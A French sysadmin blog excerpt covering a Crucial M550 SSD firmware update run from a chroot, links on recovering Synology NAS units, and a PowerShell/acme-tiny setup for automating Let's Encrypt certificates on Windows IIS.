    Displays the performance data for the specified P320/P420 drive

msecli -G [-e|-E|-g] -n <device-name> [-a] [-d <Event/Error Log id> -t <Time Stamp> ][-r] [-s <out-filename>]

    Displays the firmware event/error logs for the specified P320/P420 drive.

msecli -Z -n <device-name> [-r] [-s <out-filename>]

    Prepares the specified P320/P420 drive for removal.

msecli -V [-a] [-r] [-s <out-filename>]

    Displays the Micron Storage Executive current Version.

msecli -P <zip file name> -n <device-name> [-r] [-s <out-filename>]

    Collects debug data from the system for each micron drive

msecli -U -i <fw-folder-path> [ -m <model-number> | -n <device-name> ] [-r] [-s <out-filename>]

    Performs firmware update with the firmware folder
    for the specified client drive


Copyright (C) 2015 Micron Technology, Inc.

Yeah ! Je tente d’afficher les informations SMART du SSD

apu:/# msecli -S

CMD_STATUS   : Device Error
STATUS_CODE  : 5

Copyright (C) 2015 Micron Technology, Inc.

Oops ? Après quelques minutes de réflexion, je me suis aperçu avoir encore fait le sauvage en omettant de monter /proc . Je corrige cela prestement puis affiche les informations sur le SSD à l’aide du cli :

apu:/# msecli -L

Drive Id             : 0
Device Name          : /dev/sda
Model No             : Crucial_CT128M550SSD3
Serial No            : xxxxxxxxxxxx
FW-Rev               : MU01
Total Size           : 128.04GB
Drive Status         : Drive is in good health
Sata Link Speed      : Gen3 (6.0 Gbps)
Temp(C)              : 61

Drive information is retrieved successfully
CMD_STATUS   : Success
STATUS_CODE  : 0

Copyright (C) 2015 Micron Technology, Inc.

So far so good. Je lance la mise à jour :

apu:/# msecli -U -i /opt/firmware -m M550
This will update all the M550 drives in the system
Are you sure you want to continue(Y|N):Y

Upgrading drive /dev/sda [Serial No. XXXXXXXXXXXX] from firmware MU01 to MU02
.............
Device Name  : /dev/sda
Firmware Update on /dev/sda Succeeded!
CMD_STATUS   : Success
STATUS_CODE  : 0

Copyright (C) 2015 Micron Technology, Inc.

Done ! La mise à jour est passé sans soucis. Je reboot sur le SSD pour le réinitialiser et repasser sur le système principal pour confirmer que tout s’est bien passer.

Parce qu’Un script vaut mille mots

Ci-dessous un résumé scripté des étapes que j’ai du suivre pour mettre à jour le SSD depuis Linux et sans booter sur l’iso :

#!/bin/sh

ROOT_CRUCIAL_ISO=/tmp/crucial/iso
ROOT_CRUCIAL=/tmp/crucial/root

mkdir -p "$ROOT_CRUCIAL"
gunzip "${ROOT_CRUCIAL_ISO}/boot/core.gz
pushd "$ROOT_CRUCIAL"
cpio -F "${ROOT_CRUCIAL_ISO}/boot/core" -i
popd

# mounting /proc is mandatory for the cli to properly work
mount -t proc none "${ROOT_CRUCIAL}/proc/"
mount --rbind /sys "${ROOT_CRUCIAL}/sys/"

# in case where the kernel has grsecurity enabled, we need to allow CAPS in the chroot
echo 0 > /proc/sys/kernel/grsecurity/chroot_caps 2> /dev/null

chroot "$ROOT_CRUCIAL" sh
msecli -U -i /opt/firmware -m M550

Unbrick Synology

J’ai trouvé un article décrivant comment il peut être possible d’installer un OS, en l’occurrence NetBSD, sur du matériel Synology. Je doute d’en arriver là, mais pour avoir déjà brické mon NAS deux fois, cela peut toujours être utile. En effet, la procédure détaille comment accéder à l’interface série et donc permettre d’avoir des informations lors du boot.

Le tuto est là : Synology Diskstation Installation

Et pour démonter son NAS, plusieurs tuto/vidéos existent. Pour upgrader mon DS412+ à 2Go de RAM, j’avais notamment regardé cette vidéo: Synology DS412+ RAM Upgrade – Disassembly Tuto

Let’s Encrypt for Windows

Posted on 20 février 2017Leave a comment

Comme certain l’on peut-être vu, Mozilla puis Google ont décidé de révoquer les certificats racine de StartSSL sur leur version du navigateur sorti en janvier 2017, suite à des comportements particulièrement douteux de la part de WoSign, tant au niveau technique qu’au niveau de la transparence et de la communication. WoSign contrôlant totalement StartSSL suite à un rachat.

C’est une décision que je félicite car aujourd’hui, toute la sécurité Web repose sur l’utilisation de certificats, lesquels sont émis par une ou plusieurs autorité(s) intermédiaire(s) puis une autorité racine. La différence technique entre une autorité intermédiaire et une autorité racine est simplement au niveau des certificats présent sur les magasins de certificats côté client. En effet un des critères pour qu’un certificat soit reconnu comme valide, est qu’il soit signé par un certificat d’autorité reconnu. Afin d’être reconnu, ce certificat doit soit être lui-même signé par un certificat d’autorité reconnu, soit être manuellement accepté. On voit ainsi se former une chaîne de confiance, où il suffit de reconnaître un certificat d’autorité (qu’on appellera alors certificat d’autorité racine) pour reconnaître automatiquement tout certificat émis par cette autorité, de manière récursive. Cela présente notamment l’avantage de limiter le nombre de certificats à ajouter à la liste des certificats d’autorité de confiance côté client, parce qu’il y en a vraiment beaucoup.

Un problème majeur est qu’avec le système actuel, toute autorité de certification est en capacité d’émettre un certificat pour n’importe quel domaine. Et ce n’est pas l’ajout d’un en-tête HTTP Public Key Pinning qui peut résoudre ce problème, en effet, à partir du moment où un MITM est possible en SSL, modifier l’en-tête HPKP est un jeu d’enfant. C’est donc une bonne chose que ces grands groupes restent vigilant quant aux exactions de ces autorités, même si très sincèrement ça m’a aussi fait chier.

D’un autre côté, la décision a été prise fin octobre 2016 pour une prise d’effet concrète dès mi-janvier 2017 au niveau du système de messagerie, puis quelques jours après avec la sortie de Chrome 56. On serait tenté de croire que 2,5 mois est plutôt long, mais ça n’a pas été le cas. Bien que prévenu en avance, il n’a pas été possible de dégager suffisamment de temps pour effectuer le renouvellements de tous nos certificats émis par StartSSL, la prise d’effet nous a pris de cours et il a fallu faire les remplacements à l’arrache.

Let’s Encrypt, shall we go ?

En remplacement de StartSSL, nous avons 3 possibilités :

la classique autorité, qui te fait payer rubis sur ongle chaque certificat émis
let’s encrypt, qui est une initiative open source, soutenue par Mozilla et permet d’émettre gratuitement des certificats RSA ou EC avec l’autorisation du owner du site web pour une durée de 3 mois
certcom, qui est similaire à StartSSL, à savoir l’émission de certificats gratuits, mais cette autorité n’est reconnue de base par aucun navigateurs ou OS majeur

Let’s Encrypt semble une bonne solution mais deux choses m’avais rebuté jusqu’à présent :

La difficulté de trouver et comprendre la spécification de leur web services pour les étapes de vérification et de génération du certificat. Je n’ai à ce jour toujours rien trouvé si ce n’est du charabia abscons sans rapport avec ce workflow
Le programme client officiel qui exige d’être root pour effectuer le workflow. Le programme est monstrueusement gros d’une part, donc nécessite un audit plutôt long, et la nécessité d’être root est clairement un abus de pouvoir ou une fainéantise des devs, au choix. Dans les deux cas, c’est mal.

Je suis tombé mi-décembre sur acme-tiny, qui est un client open-source pour let’s encrypt en python et particulièrement light. Suffisamment pour auditer et comprendre son fonctionnement, et générer un script non-root qui saura faire le job dans les règles de l’art. C’est ce qui est en place sur mes environnements Linux, et cela inclut notamment ce blog. Un tutoriel existe pour sa mise en place sous Gentoo.

Partant de ce succès sous Linux, je me suis mis en tête de porter cette solution sous Windows+IIS. Le seul travail de recherche restant étant d’assurer une compatibilité de acme-tiny pour Windows. Ce dernier étant écrit en python, le travail est déjà mâché et s’est au final avéré relativement rapide.

Pré-requis installation

Installer un interpréteur Python 2.7, par exemple ActivePython
A partir de Python 2.7.10, l’interprêteur valide les certificats par défaut. Cela requiert d’installer certifi de la manière suivante : pip install certify[secure]
Installer les binaires OpenSSL pour Windows. Il n’existe pas de version compilée de OpenSSL officielle. J’utilise ceux fournit par Shining Light Productions, la version Light est suffisante.
Créer le dossier %SYSTEMDRIVE%\letsencrypt et déposez-y le script Python ainsi que les deux scripts PowerShell (voir au bas du post pour les récupérer).
- Ce dossier contiendra les clés privées des sites web et ne doit donc être accessible en lecteur que par l’utilisateur qui va effectuer le renouvellement de certificat. Pour ma part, il s’agit de SYSTEM.
Créer le dossier et les sous-dossiers %SYSTEMDRIVE%\inetpub\letsencrypt\acme-challenge
- Ce dossier doit être accessible en lecture écriture par le processus qui va effectuer le renouvellement de certificat
- Ce dossier doit être accessible en lecture par les sites web
Ajouter ce fichier web.config au dossier %SYSTEMDRIVE%\inetpub\letsencrypt\acme-challenge

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
	<system.webServer>
		<staticContent>
			<mimeMap fileExtension=".*" mimeType="text/plain"/>
		</staticContent>
		<handlers>
			<clear />
			<add name="StaticFile" path="*" verb="GET" type="" modules="StaticFileModule,DefaultDocumentModule,DirectoryListingModule" scriptProcessor="" resourceType="Either" requireAccess="Read" allowPathInfo="false" preCondition="" responseBufferLimit="4194304" />
		</handlers>
	</system.webServer>
</configuration>

Avant de générer le premier certificat, il est nécessaire de créer une clé privée afin d’être reconnu par Let’s Encrypt. Cela se fait avec les commandes suivantes dans une console administrative :

cd "$env:SystemDrive\letsencrypt"
Import-Module .\get-signed-cert.ps1

# where letsencrypt-account.key is where the key will be written
New-LetsEncryptAccountKey -Outfile letsencrypt-account.key

Note : pour l’instant le script d’acme-tiny a été modifié pour le faire fonctionner sous Windows et ne fonctionne plus pour Linux. Je dois le nettoyer un peu et ferais un pull-request sur le dépôt afin d’intégrer cette capacité au script sans besoin de le modifier manuellement.

Pré-requis pour chaque site web

Une fois l’installation au niveau du serveur effectué, il y a une manipulation à effectuer pour chaque site web à sécuriser. Il faut ajouter un répertoire virtuelle à la racine du site, nommé .well-known et devant pointer sur %SYSTEMDRIVE%\inetpub\letsencrypt , créé précédemment, comme suit :

Puis nous allons générer une clé privée (au moins deux si vous utilisez HPKP) dédiée à ce site. A ce jour, il existe deux types de clefs qui sont supportés, les vénérables clés RSA et les fancy clés à base de courbes elliptiques.

cd "$env:SystemDrive\letsencrypt"
Import-Module .\get-signed-cert.ps1

# for generating an ecc key
New-ECPrivateKey -Password aFuckingGoodPassword -Outfile mywebsite-ec.key

# for generating an rsa key
New-RSAPrivateKey -Password anotherFuckingGoodPassword -Outfile mywebsite-rsa.key

Le script génère des clés RSA de 2048 bits, et des clés ECC en utilisant, pour le moment, la courbe prime256v1, aussi nommé NIST-P256.

Warning : Je sais que cette courbe présente des faiblesses, mais je n’ai pas encore eu le temps de me pencher sur leurs impacts ni pu trouver un remplaçant, sachant que toutes les courbes ne sont pas aptent à faire du HTTPS en TLS 1.2.

Générer un Certificat

La génération d’un certificat se fait en une seule commande qui devrait bien se passer, pourvu que vous ayez bien suivi toutes les étapes d’installation, y compris au niveau de la configuration des accès.

Import-Module .\get-signed-cert.ps1

Renew-Certificate -SiteName "MyWebSite1" -KeyFile MyWebSite1-ec.key -KeyFilePassword 'a Fucking good Password' -LetsEncryptKey letsencrypt-account.key

Il reste l’automatisation. Pour ce faire, nous allons simplement enregistrer le script ci-dessus dans le fichier renew MyWebSite1.ps1 et l’enregistrer dans le dossier %SYSTEMDRIVE%\letsencrypt . Puis il reste à créer la tâche planifiée. Afin de ne pas avoir à gérer le changement de mot de passe sur les utilisateurs standard, j’ai configuré la tâche pour qu’elle s’exécute avec l’utilisateur SYSTEM.

L’action sera l’exécution d’un programme, avec les paramètres suivants :

le programme : %windir%\System32\WindowsPowerShell\v1.0\powershell.exe
les arguments: -Run .\renew.ps1
Le dossier de travail (où se trouve le script renew.ps1) : C:\letsencrypt
$La tâche planifiée va exécuter le programme %windir%\system32\WindowsPowerShell\v1.0\powershell.exe -Command ". renew mywebsite.ps1"$

Le certificat étant valide 3 mois, on peut se limiter à un renouvellement mensuel, ce qui permet en outre d’avoir 2 renouvellements ratés sans que cela ne perturbe l’accessibilité du site.

Le CSR et le certificat ne sont pas conservé sur le disque, seul la clé est conservée. Le CSR est bien suffisant pour récupérer le certificat signé, cependant l’import d’un certificat avec sa clé privée dans le magasin de certificats de Windows nécessite de l’importer avec sa clé privée. Il n’est à ma connaissance pas possible par exemple d’importer juste le certificat (publique), puis de l’associer avec la clé qui va bien dans le magasin de certificat.

Le Script

On y est, voici le cœur de la machine.

OpenSSL ne se trouvant par défaut pas dans le path, il est nécessaire d’indiquer au script où il se trouve, ce qui est fait à la ligne 4, et que vous aurez peut-être à modifier.

# script to generate a signed certificate for a single domain
Import-Module WebAdministration -ErrorAction Stop

$OPENSSL_PATH = 'C:\OpenSSL-Win64\bin'
$DefaultCertStore = Cert:\LocalMachine\WebHosting

if (-not ($env:Path -contains $OPENSSL_PATH)) {
    $env:Path += ";$OPENSSL_PATH"
}

function Get-TempPassword {
    param(
        [int]$Size
    )

    -join ((45..57) + (65..90) + (97..122) | Get-Random -Count $Size | % {[char]$_})
}

function New-RSAPrivateKey {
    param(
        [string]$Password,
        [string]$OutFile,
        [int]$KeySize = 2048
    )

    if ([string]::IsNullOrEmpty($Password)) {
        openssl genrsa -out $OutFile $KeySize 2> $null
    } else {
        if ($Password.Length -lt 4) {
            Write-Error "The password MUST be greater than 4 chars"
            return
        }
        
        openssl genrsa -out $OutFile -aes128 -passout pass:$Password $keySize 2> $null
    }
}

function New-LetsEncryptAccountKey {
    param(
        [string]$Outfile
    )

    New-RSAPrivateKey -OutFile $Outfile -KeySize 4096
}

function New-ECPrivateKey {
    param(
        [string]$Password,
        [string]$Outfile
    )

    $ec_name = 'prime256v1'

    $ec_param = & openssl ecparam -conv_form compressed -name $ec_name -genkey

    if ([string]::IsNullOrEmpty($Password)) {
        $ec_param | & openssl ec -out $Outfile 2> $null
    } else {
        if ($Password.Length -lt 4) {
            Write-Error "The password MUST be greater than 4 chars"
            return
        }

        $ec_param | & openssl ec -out $Outfile -aes128 -passout pass:$Password 2> $null
    }
}

function New-CertificateRequest {
    param(
        [string]$KeyFile,
        [string]$KeyFilePassword,
        [string]$DomainName,
        [string]$OutFile
    )

    if ([string]::IsNullOrEmpty($KeyFilePassword)){
        openssl req -new -subj /CN=$DomainName/ -sha256 -key $KeyFile -out $OutFile
    } else {
        openssl req -new -subj /CN=$DomainName/ -sha256 -key $KeyFile -out $OutFile -passin pass:$KeyFilePassword
    }    
}

function Renew-Certificate {
    param(
        [string]$SiteName,
        [string]$LetsEncryptKey,
        [string]$KeyFile,
        [String]$KeyFilePassword,
        [string]$CertStore = $DefaultCertStore
    )

    $rootLetsEncrypt = "$env:SystemDrive\inetpub\lets-encrypt"
    $webSite = Get-Website -Name $SiteName
    $rootPath = $webSite.physicalPath
    $bindingString = ($webSite | Get-WebBinding -Protocol http).bindingInformation
    $domainName = $bindingString.Split(':')[2]

    if (-not (Test-Path $rootLetsEncrypt -PathType Container)) {
        New-Item $rootLetsEncrypt -ItemType Directory
    }

    $csr = [System.IO.Path]::GetRandomFileName()
    $csrFullPath = [System.IO.Path]::Combine($env:TEMP, $csr)
    $crt = [System.IO.Path]::GetRandomFileName()
    $crtFullPath = [System.IO.Path]::Combine($env:TEMP, $crt)

    Write-Host "CRT: $crtFullPath"

    New-CertificateRequest -KeyFile $KeyFile -KeyFilePassword $KeyFilePassword -DomainName $domainName -OutFile $csrFullPath
    & python .\acme-tiny.py --account-key $LetsEncryptKey --csr $csrFullPath --acme-dir $rootLetsEncrypt\acme-challenge > $crtFullPath

    $pfx = [System.IO.Path]::GetRandomFileName()
    $pfxFullPath = [System.IO.Path]::Combine($env:TEMP, $pfx)
    $pfxPassword = Get-TempPassword 12
    $displayName = "Let's Encrypt $domainName $([datetime]::Today.ToString("yyyy-MM-dd"))"
    Get-Content -Path $KeyFile,$crtFullPath | & openssl pkcs12 -export -name $displayName -passout pass:$pfxPassword -passin pass:$KeyFilePassword -out $pfxFullPath
    $cert = Import-PfxCertificate -FilePath $pfxFullPath -Password (ConvertTo-SecureString -AsPlainText -Force $pfxPassword) -CertStoreLocation $CertStore -ErrorAction Stop

    $currentSSLBinding = Get-Item IIS:\SslBindings\* | Where-Object { $_.Port -eq 443 -and $_.Host -eq $domainName }
    $currentSSLBindingName = $currentSSLBinding.PSChildName

    $currentSSLBinding | Remove-Item
    Get-Item -Path "$CertStore\$($cert.Thumbprint)" | New-Item -Path IIS:\SslBindings\$currentSSLBindingName

    Remove-Item $pfxFullPath
    Remove-Item $crtFullPath
    Remove-Item $csrFullPath
}

Ce script se découpe en 2 parties :

La première partie est principalement du wrapping autour de openssl pour générer des clés privées en RSA ou ECDSA.
La seconde partie est l’utilisation de acme-tiny (wrapping), et la reconfiguration de IIS et le magasin de certificat de Windows avec des cmdlets natives

Il est relativement simple à lire. On peut remarquer qu’un binding ne peut pas être modifié, il doit être détruit puis être recréée.